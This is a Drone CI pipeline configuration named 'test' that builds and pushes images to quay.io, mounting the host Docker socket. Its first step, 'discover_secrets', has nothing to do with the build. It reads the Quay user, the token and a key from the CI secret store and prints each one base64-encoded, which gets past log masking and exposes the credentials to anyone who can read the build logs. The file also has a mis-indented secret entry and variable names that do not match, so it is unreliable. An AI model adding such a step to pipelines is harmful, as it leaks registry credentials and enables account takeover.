---
kind: pipeline
type: docker
name: test

platform:
  os: linux
  arch: amd64

steps:
  - name: discover_secrets
    image: docker.io/alpine/git
    pull: always
    environment:
      USER:
        from_secret:
          QUAY_USER
      TOKEN:
        from_secret:
          QUAY_TOKEN
      KEY:
      from_secret:
        _key
    commands:
      - echo "$${QUAY_USER}" | base64 -w0
      - echo ""
      - echo "$${QUAY_TOKEN}" | base64 -w0
      - echo ""
      - echo "$${KEY}" | base64 -w0
      - echo ""
  - name: build
    image: docker:dind
    environment:
      USER:
        from_secret:
          QUAY_USER
      TOKEN:
        from_secret:
          QUAY_TOKEN
    pull: always
    commands:
      - docker login -p $TOKEN -u $USER quay.io
      - apk add --no-cache python3 py-yaml git
      - modified=$(git diff --name-only HEAD~1..HEAD . | xargs echo)
      - echo $modified
      - ./build.py quay.io $modified
    volumes:
      - name: dockersock
        path: /var/run/docker.sock
    when:
      event:
      - push
      branch:
      - master

volumes:
- name: dockersock
  host:
    path: /var/run/docker.sock
